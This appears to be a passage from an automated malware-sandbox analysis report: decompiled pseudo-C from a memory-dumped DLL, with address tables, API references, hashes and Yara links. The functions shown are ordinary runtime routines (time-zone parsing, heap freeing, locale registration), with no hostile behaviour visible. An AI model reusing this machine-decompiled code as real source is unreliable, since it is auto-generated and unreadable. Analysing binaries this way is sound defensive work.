						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6E21877C(0x6e232130, _t172, __eflags);
							}
						}
						E6E20CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6E1DF8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6E218231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E21825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E20CBD3( *0x6e287a08);
								 *0x6e287a08 = 0;
								 *_t194 = 0x6e287a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e287a18 * 0x3c;
									_t168 =  *0x6e287a6c;
									_push(_t171);
									 *0x6e287a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6e287a5e;
									if( *0x6e287a5e != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e287ab2;
									if( *0x6e287ab2 == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e287ac0;
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E203CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e287a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e287a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E218225()) = _v12;
								 *((intOrPtr*)(E6E218219())) = _v16;
								_t96 = E6E21821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e287a08;
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E20CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e218b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e218b6e
						 *0x6e287a08 = E6E20F26D(_t154 - _t170, _t13);
						_t116 = E6E20CBD3(0);
						_t167 =  *0x6e287a08;
						if( *0x6e287a08 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e218b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e218b6e
							_t119 = E6E20AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6E223B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E20BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E20BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E20BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E218225()) = _v8;
										_t128 = E6E218219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E223B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

0x6e21877c
0x6e218786
0x6e21878b
0x6e21878f
0x6e218791
0x6e218799
0x6e2187a4
0x6e218944
0x6e218946
0x6e218947
0x6e218948
0x6e218949
0x6e21894a
0x6e21894b
0x6e218950
0x6e218954
0x6e218956
0x6e218959
0x6e218960
0x6e218964
0x6e218967
0x6e21896b
0x6e21896e
0x6e218971
0x6e218976
0x6e218977
0x6e218979
0x6e218aa1
0x6e218aa1
0x6e218aa2
0x6e218aa3
0x6e218aa4
0x6e218aa5
0x6e218aa6
0x6e218aab
0x6e218aae
0x6e218aaf
0x6e218abe
0x6e218ac1
0x6e218ace
0x6e218ad5
0x6e218ad6
0x6e218ad7
0x6e218add
0x6e218aec
0x6e218af3
0x6e218afb
0x6e218afd
0x6e218b07
0x6e218b0a
0x6e218b17
0x6e218b1a
0x6e218b1c
0x6e218b35
0x6e218b3d
0x6e218b3f
0x6e218b45
0x6e218b4a
0x6e218b41
0x6e218b41
0x00000000
0x6e218b41
0x6e218b1e
0x6e218b1e
0x6e218b1f
0x6e218b1f
0x6e218b1f
0x6e218b4c
0x6e218aff
0x6e218aff
0x6e218aff
0x6e218b59
0x6e218b5b
0x6e218b5d
0x6e218b5f
0x6e218b6f
0x6e218b6f
0x6e218b61
0x6e218b61
0x6e218b64
0x00000000
0x6e218b66
0x6e218b66
0x6e218b67
0x6e218b6c
0x6e218b64
0x6e218b75
0x6e218b80
0x6e218b8b
0x6e21897f
0x6e218983
0x6e218988
0x6e218989
0x6e21898b
0x00000000
0x6e218991
0x6e218995
0x6e21899a
0x6e21899b
0x6e21899d
0x00000000
0x6e2189a3
0x6e2189a9
0x6e2189ae
0x6e2189b4
0x6e2189bb
0x6e2189c1
0x6e2189c4
0x6e2189ca
0x6e2189d1
0x6e2189d7
0x6e2189db
0x6e2189e1
0x6e2189e4
0x6e2189eb
0x6e2189f0
0x6e2189f0
0x6e2189f2
0x6e2189f2
0x6e2189f5
0x6e2189fc
0x6e218a14
0x6e218a14
0x6e218a17
0x6e2189fe
0x6e2189fe
0x6e218a03
0x6e218a05
0x00000000
0x6e218a07
0x6e218a09
0x6e218a0f
0x6e218a0f
0x6e218a05
0x6e218a1f
0x6e218a33
0x6e218a39
0x6e218a3b
0x6e218a49
0x6e218a4b
0x6e218a3d
0x6e218a3d
0x6e218a40
0x00000000
0x6e218a42
0x6e218a44
0x6e218a44
0x6e218a40
0x6e218a60
0x6e218a67
0x6e218a69
0x6e218a78
0x6e218a7b
0x6e218a6b
0x6e218a6b
0x6e218a6e
0x00000000
0x6e218a70
0x6e218a73
0x6e218a73
0x6e218a6e
0x6e218a69
0x6e218a85
0x6e218a8f
0x6e218a94
0x6e218a99
0x6e218aa0
0x6e218aa0
0x6e21899d
0x6e21898b
0x6e2187bc
0x6e2187bc
0x6e2187c2
0x6e2187c7
0x6e2187fd
0x6e2187fe
0x6e218804
0x6e218806
0x6e218806
0x6e218809
0x6e218809
0x6e21880b
0x6e21880c
0x6e218812
0x6e21881d
0x6e218822
0x6e218827
0x6e218831
0x00000000
0x6e218837
0x6e218837
0x6e218839
0x6e21883a
0x6e21883a
0x6e21883d
0x6e21883d
0x6e21883f
0x6e218840
0x6e218847
0x6e21884c
0x6e218851
0x6e218856
0x6e21885e
0x6e21885f
0x6e218865
0x6e21886a
0x6e21886f
0x6e218875
0x6e21887a
0x6e21887b
0x6e21887e
0x00000000
0x00000000
0x00000000
0x6e21887e
0x6e218883
0x6e218884
0x6e218889
0x6e21888b
0x6e21888b
0x6e218893
0x6e218899
0x6e21889c
0x6e21889c
0x6e2188a0
0x00000000
0x00000000
0x6e2188aa
0x6e2188aa
0x6e2188ad
0x6e2188b0
0x6e2188b2
0x6e2188c0
0x6e2188c2
0x6e2188cc
0x6e2188cc
0x6e2188ce
0x6e2188d0
0x00000000
0x00000000
0x6e2188c7
0x6e2188c9
0x6e2188cb
0x6e2188cb
0x00000000
0x6e2188cb
0x00000000
0x6e2188c9
0x6e2188d2
0x6e2188d5
0x6e2188d7
0x6e2188e2
0x6e2188e4
0x6e2188ee
0x6e2188ee
0x6e2188f0
0x6e2188f2
0x00000000
0x00000000
0x6e2188e9
0x6e2188eb
0x6e2188ed
0x6e2188ed
0x00000000
0x6e2188ed
0x00000000
0x6e2188eb
0x6e2188ee
0x6e2188d5
0x6e2188f4
0x6e2188f4
0x6e2188f6
0x6e2188fa
0x6e2188fa
0x6e2188ff
0x6e218901
0x6e218904
0x6e218907
0x6e218909
0x6e21890c
0x6e218924
0x6e218927
0x6e21892a
0x6e218932
0x6e218937
0x6e21893c
0x00000000
0x6e21893c
0x6e21890e
0x6e218913
0x6e218916
0x6e21891b
0x6e21891e
0x6e218920
0x00000000
0x00000000
0x6e218922
0x6e21886f
0x00000000
0x6e218856
0x6e2187c9
0x6e2187c9
0x6e2187cb
0x6e2187cd
0x6e2187cd
0x6e2187d1
0x00000000
0x00000000
0x6e2187d5
0x6e2187e9
0x6e2187e9
0x6e2187d7
0x6e2187d7
0x6e2187d7
0x6e2187dd
0x00000000
0x6e2187df
0x6e2187df
0x6e2187e2
0x6e2187e7
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2187e7
0x6e2187dd
0x6e2187f2
0x6e2187f4
0x6e218943
0x6e218943
0x6e2187fa
0x6e2187fa
0x00000000
0x6e2187fa
0x00000000
0x6e2187f4
0x6e2187ed
0x6e2187ef
0x6e2187ef
0x00000000
0x6e2187ef
0x6e2187c7
0x00000000

APIs

_free.LIBCMT ref: 6E2187FE
_free.LIBCMT ref: 6E218822
_free.LIBCMT ref: 6E2189A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60
_free.LIBCMT ref: 6E218B75

Strings

0!#n, xrefs: 6E218964, 6E21896A
0!#n, xrefs: 6E218AD8

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!#n$0!#n
API String ID: 314583886-3624508691
Opcode ID: 12627bd429004748b48d57a478fdc163d295cd05ff7410d13bda5d43afee6539
Instruction ID: 23a6e4e1c5b83169292d934ed07ee66a08b09556963554a62719022d91549310
Opcode Fuzzy Hash: 12627bd429004748b48d57a478fdc163d295cd05ff7410d13bda5d43afee6539
Instruction Fuzzy Hash: 70C12875A0824EAFDB098FE8C8D4AEA7BFFAF46314F14455AD691D7280E7308B41C761

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E20D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e230c10) {
					E6E20CBD3(_t52);
					_t26 = _a4;
				}
				E6E20CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E20D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6E20D28E(4,  &_v8);
			}

APIs

_free.LIBCMT ref: 6E20D403

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E20D40F
_free.LIBCMT ref: 6E20D41A
_free.LIBCMT ref: 6E20D425
_free.LIBCMT ref: 6E20D430
_free.LIBCMT ref: 6E20D43B
_free.LIBCMT ref: 6E20D446
_free.LIBCMT ref: 6E20D451
_free.LIBCMT ref: 6E20D45C
_free.LIBCMT ref: 6E20D46A

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c29ffdec72d6794a1666693f3202838039e9982cbb23024250e878eec34f0652
Instruction ID: 02c24aa89059d7b7a161fff395e392460e3a6384a0d5c1cc111f86832b4b651c
Opcode Fuzzy Hash: c29ffdec72d6794a1666693f3202838039e9982cbb23024250e878eec34f0652
Instruction Fuzzy Hash: 9611FBB954400CBFCB01DF94C841DDE3BBAEF04654B2144A0F9094F1B2EB75DE509B91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1C777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t50 =  *0x6e286c10;
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6E1A161C(0x6e286b2c);
				_t38 = _a8;
				_t20 = E6E1A171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1C7E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6E1A1438(_t42);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t48);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6e286c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1C7786
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C7790
int.LIBCPMT ref: 6E1C77A7

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1C77CA
std::_Facet_Register.LIBCPMT ref: 6E1C77E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C7801
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C781F

Strings

,k(n, xrefs: 6E1C779B

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,k(n
API String ID: 2594415655-2020936110
Opcode ID: 126dc61b5353e8e8ce37dd38b912506a8d564d9fdb0ff6fb87c5da0ebeeab358
Instruction ID: fe987b9a326b85dc330a66738f4135c667c0313f0e37f567eaa3ba5c8c05ae5f
Opcode Fuzzy Hash: 126dc61b5353e8e8ce37dd38b912506a8d564d9fdb0ff6fb87c5da0ebeeab358
Instruction Fuzzy Hash: FF11E97591061D9BCB01EBE4C844AFEB77ABF64B14F140809E510E7290DFB89D85D792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CEEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CEEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t990 - 0x14, 0);
				_t945 =  *0x6e286e04;
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6E1A161C(0x6e286b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6E1C66BA(_t990 - 0x14);
					return E6E1E0075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6E1D0C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t990 - 0x20);
							E6E1E3D74(_t990 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t922, _t945, 0x14);
							E6E1C6653(_t990 - 0x14, 0);
							_t946 =  *0x6e286de4;
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6E1A161C(0x6e286d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6E1C66BA(_t990 - 0x14);
								return E6E1E0075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6E1D0D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t990 - 0x20);
										E6E1E3D74(_t990 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t699, _t923, _t946, 0x14);
										E6E1C6653(_t990 - 0x14, 0);
										_t947 =  *0x6e286db4;
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6E1A161C(0x6e286d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6E1C66BA(_t990 - 0x14);
											return E6E1E0075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6E1D0DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t990 - 0x20);
													E6E1E3D74(_t990 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t699, _t924, _t947, 0x14);
													E6E1C6653(_t990 - 0x14, 0);
													_t948 =  *0x6e286dd4;
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6E1A161C(0x6e286b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6E1C66BA(_t990 - 0x14);
														return E6E1E0075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6E1D0E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t990 - 0x20);
																E6E1E3D74(_t990 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t699, _t925, _t948, 0x14);
																E6E1C6653(_t990 - 0x14, 0);
																_t949 =  *0x6e286de8;
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6E1A161C(0x6e286d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6E1C66BA(_t990 - 0x14);
																	return E6E1E0075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6E1D0EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t990 - 0x20);
																			E6E1E3D74(_t990 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t699, _t926, _t949, 0x14);
																			E6E1C6653(_t990 - 0x14, 0);
																			_t950 =  *0x6e286db8;
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6E1A161C(0x6e286d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6E1C66BA(_t990 - 0x14);
																				return E6E1E0075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6E1D0F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t990 - 0x20);
																						E6E1E3D74(_t990 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t699, _t927, _t950, 0x14);
																						E6E1C6653(_t990 - 0x14, 0);
																						_t951 =  *0x6e286dec;
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6E1A161C(0x6e286d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6E1C66BA(_t990 - 0x14);
																							return E6E1E0075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6E1D0F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t990 - 0x20);
																									E6E1E3D74(_t990 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t699, _t928, _t951, 0x14);
																									E6E1C6653(_t990 - 0x14, 0);
																									_t952 =  *0x6e286dbc;
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6E1A161C(0x6e286d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6E1C66BA(_t990 - 0x14);
																										return E6E1E0075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6E1D0FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t990 - 0x20);
																												E6E1E3D74(_t990 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t699, _t929, _t952, 0x14);
																												E6E1C6653(_t990 - 0x14, 0);
																												_t953 =  *0x6e286df0;
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6E1A161C(0x6e286d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6E1A171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6E1C66BA(_t990 - 0x14);
																													return E6E1E0075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6E1D1057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t990 - 0x20);
																															E6E1E3D74(_t990 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t699, _t930, _t953, 0x14);
																															E6E1C6653(_t990 - 0x14, 0);
																															_t954 =  *0x6e286dc0;
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6E1A161C(0x6e286d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
